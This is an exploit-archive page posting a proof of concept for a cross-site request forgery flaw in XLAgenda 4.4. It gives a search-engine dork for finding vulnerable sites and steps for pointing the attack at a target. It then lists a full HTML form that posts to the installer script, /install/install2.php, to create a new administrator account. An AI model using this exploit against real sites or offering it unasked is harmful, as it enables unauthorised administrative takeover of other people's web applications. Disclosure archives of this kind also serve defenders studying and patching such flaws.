exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

XLAgenda 4.4 Cross Site Request Forgery

XLAgenda 4.4 Cross Site Request Forgery
Posted Jul 27, 2023
Authored by indoushka

XLAgenda version 4.4 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | b32d86f04f194dce3c7ff53cbf3caca6972b63541fb6d557a75d1b79c5076778

XLAgenda 4.4 Cross Site Request Forgery

Change Mirror Download
====================================================================================================================================
| # Title : XLAgenda v4.4 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) |
| # Vendor : https://xavier.lequere.net/xlagenda/ |
| # Dork : "Propulsé par XLAgenda 4.4" |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin.

[+] Go to the line 12.

[+] Set the target site link Save changes and apply.

[+] infected file : /install/install2.php.

[+] http://127.0.0.1/xlagenda44/install/install2.php

[+] save code as poc.html .

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>XLAgenda 4.4 | Installation</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex, nofollow" />
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<h1>Installation - Etape 2/3</h1>
<p class="confirmation">Les tables ont été créées avec succès dans votre base de données.</p>
<form name="form1" method="post" action="http://127.0.0.1/xlagenda44/install/install2.php">
<h3>Choisissez un nom d'utilisateur et un mot de passe d'administration</h3>
<p>
<label for="user">Nom d'utilisateur :</label><br>
<input name="user" type="text" id="user" value="" maxlength="20" size="30" /> *<br>
(20 caractères maximum)
</p>
<p>
<label for="pass">Mot de passe :</label><br>
<input name="pass" type="password" id="pass" maxlength="15" size="30" /> *<br>
(6 à 15 caractères)
</p>
<p>
<label for="pass2">Introduisez à nouveau le mot de passe :</label><br>
<input name="pass2" type="password" id="pass2" maxlength="15" size="30" /> *
</p>
<p>
<label for="nom">Nom :</label><br>
<input name="nom" type="text" id="nom" value="" size="30" />
</p>
<p>
<label for="prenom">Prénom :</label><br>
<input name="prenom" type="text" id="prenom" value="" size="30" />
</p>
<p>
<label for="email">Adresse email :</label><br>
<input name="email" type="text" id="email" value="" size="30" /> *
</p>
<p>
Les champs marqués d'un * sont obligatoires.<br>
Votre adresse email n'appara&icirc;tra pas sur l'agenda mais est nécessaire pour vous permettre de récupérer votre mot de passe si vous l'avez oublié.
</p>
<p style="text-align:center;">
<input type="submit" name="Submit" value="Continuer >>" />
</p>
</form></body>
</html>


Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    53 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close